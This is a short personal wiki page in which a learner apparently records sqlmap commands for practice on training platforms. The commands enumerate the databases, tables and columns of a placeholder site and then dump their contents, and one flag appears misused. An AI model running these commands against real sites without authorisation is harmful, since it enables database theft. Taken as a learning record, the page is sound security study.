sqlmap - marko4449/Documentation2 GitHub Wiki

#Start

Hello fellow stranger who is visiting my not so public repository! This documentation deals with my self improvement education. Starting by learning about using sqlmap for security reasons which may come in handy for me in the future jobs if i have to test something. Also for the sites rangeforce.com and hackthebox.eu

Alright first off we need to see what kinds of databases are in the website by executing the following command.

sqlmap -u "example.com" --dbms

Now that we have the databases were off to getting the tables

sqlmap -u "example.com" -D $databasename --tables

Now off to seeing the columns

sqlmap -u "example.com" -D $databasename --columns

sqlmap -u "example.com" -D $databasename -C $column1,$column2 --dump